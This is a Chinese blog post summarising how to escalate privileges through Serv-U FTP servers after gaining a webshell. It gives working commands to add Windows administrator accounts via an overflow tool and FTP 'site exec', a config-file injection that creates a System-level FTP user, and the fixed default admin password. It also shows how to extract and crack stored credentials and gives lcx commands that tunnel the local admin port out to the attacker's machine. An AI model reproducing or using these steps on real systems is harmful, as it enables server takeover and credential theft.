最新消息:

serv-u提权总结

提权 admin 7404浏览 0评论

根据查阅资料,serv-u提权由于版本不同提权方法也有所不同,现把网上的资料整理一下,如有遗漏,以后再补充。serv-u提权主要分为serv-u6及以前版本、serv-u7以下版本的提权,serv-u7版本提权等。

主要提权方法:

一、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下 比如是d盘
3、执行命令 d:\serv_u.exe
4、d:\serv_u.exe “net user username password /add” (注意命令要有引号)
5、d:\serv_u.exe “net localgroup administrators username /add” (注意命令要有引号)

二、ServUDaemon.ini 文件重写后提权(对ServUDaemon.ini有写入的权限)。注意,我在serv-u6.4.06中测试没有成功,即虽然FTP用户添加成功,但添加的用户没有命令执行权限(虽然显示添加的用户是管理员用户)。所以,在实际环境中本方法不一定成功,不过要尝试以下。

先修改Domain来添加用户

[Domain1]

User2=spider|1|0

然后在ServUDaemon.ini文件尾部追下如下代码来添加用户的详细信息:

[USER=spiger|1]
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5
HomeDir=c:\
RelPaths=3
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
SKEYValues=
添加上述代码并保存后,就会在serv-u中添加用户名为spiger,密码是123456。

通过在本地命令行执行ftp 目标IP地址  命令来连接目标FTP服务器。
连接后quote site exec net user spiger 123456 /add
quote site exec net localgroup administrators spiger /add

ps:上述添加的文件中最重要的是Maintenance=System这句,有了这句添加的FTP用户才是管理员用户,才会有命令执行权限(因为最后是通过FTFP执行命令来添加系统用户的)。

三、serv-u配置文件无修改权限,但是可以看到配置文件,进行口令破解

看到FTP用户的配置文件ServUDaemon.ini,在其中找到Maintenance=System的用户,该用户就是系统管理员。如果能够成功破解系统管理员的口令,就可以利用该管理员执行添加系统管理员的用户(类似方法二)。

serv-u配置文件中Password字段就是用户口令加密变换后的字符串,破解方法:去掉前两位,剩下的进行md5破解,破解后再去掉前两位,剩下的就是FTP用户口令。

四、serv-u配置文件无修改权限,可以用Serv-u管理用户来进行提权(这是最常用的方法,一般大马中集成的serv-u提权方法就是本方法)

serv-u的默认管理端口是43958,只有本地才能进行连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是”#l@$ak#.lk;0@P“,这个密码是固定的。如果网站管理员忘记修改密码,那么获取webshell后就可以连接该端口后执行命令来添加系统用户。

0131110195405

虽然,网站管理员很少修改serv-u的这个默认管理账号和口令,但是如果管理员修改了,我们还可以通过查看ServUAdmin.exe文件来获取管理账号和口令。方法如下:下载serv-u目录下的ServUAdmin.exe文件,在本地用文本文件打开,查找LocalAdministrator字符来获取口令位置:

20131110200041

可以看到serv-u的管理账号和口令都在文件中,仔细查找即可(如果连用户名也修改了,就搜127.0.0.1或记住账号和密码在文件中的位置)。获取管理账号和口令后就可以利用大马自带的serv-u来进行提权了。

五、serv-u ftp转发端口

上一种方法中提到serv-u的本地管理账号只能本地进行连接,但我们可以利用端口转发的方式来将其管理端口转发的本地,进而提权。在目标Webshell上运行LCX:lcx -slave 你的IP 5000 127.0.0.1 43958
在本机上运行:lcx -listen 5000 21

打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P

此时的连接过程是:本机连接21端口——>转发往本机5000端口——>管道连接至远程机5000端口——>转发至远程43958端口

连接成功后,在本机登陆Serv_U就相当于登陆了远程的Serv_U。你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令。

——————————————————————————————-

上面是serv-u6及以下的主要方法,其中方法也适用于servu-7等版本,只是文件路径可能有所变化。下面讲serv-u7及以上版本的提权,不适用于serv-u6是因为文件路径发生变化,serv-u6没有相应文件。

serv-u7中管理员的口令在C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive文件中,破解方法和serv-u6是一样的。

 

参考文献:

1、http://www.spiger.cn/article/206.html

2、http://www.cnblogs.com/top5/archive/2010/06/03/1750816.html

3、http://hi.baidu.com/dvbbs112/item/33d6f44678cf74a361d7b9bb

4、http://hi.baidu.com/sdghgk/item/37b433ce7bce197489ad9e82 记一次serv-u提权

———————————————————————————————————————————

本人的serv-u提权过程,测试serv-u版本是6.4

1、首先确定是否开启serv-u(端口43958端口开放,ftp banner)。

2、看是否能利用serv-u默认管理用户名和口令来进行提权。即LocalAdministrator与#l@$ak#.lk;0@P

0131110195405

3、如果默认密码改了,则下载ServUAdmin.exe文件来查找用户名和口令。

20131110200041

4、如果不能利用serv-u管理员账号来进行提权,则查看ServUDaemon.ini来添加具有管理员权限的FTP用户,或者破解具有管理员权限的FTP用户的口令。获取FTP管理员权限的用户后,通过执行命令的方式来添加系统用户。

 

20131110213558

然后本地连接FTP用户来执行命令添加系统管理员用户。

20131110213908

5、除此之外,还可以将serv-u的端口通过lcx将其转发出来,本地进行serv-u的管理与提权。

 

 

 

转载请注明:jinglingshu的博客 » serv-u提权总结


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址